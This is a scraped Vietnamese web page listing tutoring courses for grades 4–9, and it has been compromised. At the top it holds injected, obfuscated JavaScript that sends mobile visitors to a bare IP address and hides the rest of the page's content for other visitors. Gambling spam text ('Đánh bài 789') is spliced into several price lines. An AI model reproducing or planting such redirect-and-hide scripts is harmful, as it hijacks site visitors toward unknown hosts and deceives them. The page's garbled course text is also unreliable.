function goPAGE() { if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://180.215.56.197/" } else { var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if (myid != "iconDiv1" && myid != "yangchen") { document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {} } } goPAGE();

Học tốt Lớp 6-9: Bí kíp HỌC + ÔN vững chắc để con tự tin chinh phục điểm cao năm học 2019 - 2020. Xem ngay!

Danh mục giải bài tập và soạn bài

Giới thiệu hệ thống VietJack

Top các khóa học THPT được xem nhiều nhất

Tổng hợp các video dạy học từ các giáo viên giỏi nhất

4.7 (243)

799,000đ

599,000 VNĐ

4.5 (243)

799,000đ

599,000 VNĐ

4.5 (243)

799,000đ

599,000 VNĐ

4.5 (243)

799,000đ

599,000 VNĐ

4.5 (243)

799,000đ

599,000 VNĐ

4.5 (243)

799,000đ

599,000 Đánh bài 789VNĐ

4.5 (243)

799,000đ

599,000 VNĐ

4.5 (243)

799,000đ

599,000 Đánh bài 789VNĐ

Các khóa học cấp 1 & cấp 2 bán chạy

Các khóa học cho học sinh từ lớp 4 đến lớp 9

Xem tất cả khóa học

Tổng ôn Toán vào 10 - Cô Nguyễn Hồng Nhung

4.5 (243)

799,000đ

599,000 Đánh bài 789VNĐ

Học tốt toán 8 - Thầy Phan Toàn

4.5 (243)

799,000đ

599,000 Đánh bài 789VNĐ

Học tốt toán 7 - Thầy Lê Tuấn Anh

4.5 (243)

799,000đ

599,000 VNĐ

Tiếng Anh lớp 6 - cô Tuyết Nhung

4.5 (243)

799,000đ

599,000 VNĐ

Tiếng Anh lớp 5 - Cô Giang Ly

4.5 (243)

799,000đ

599,000 VNĐ

Tiếng Anh Lớp 4 - cô Giang Ly

4.5 (243)

799,000đ

599,000 Đánh bài 789VNĐ

Toán 4 - Cô Nguyễn Thị Ngọc

4.5 (243)

799,000đ

599,000 VNĐ

Giáo viên tại poclink.com

Đội ngũ giáo viên giỏi đã tạo ra các tài liệu học tập online trên web và youtube dành cho tất cả mọi người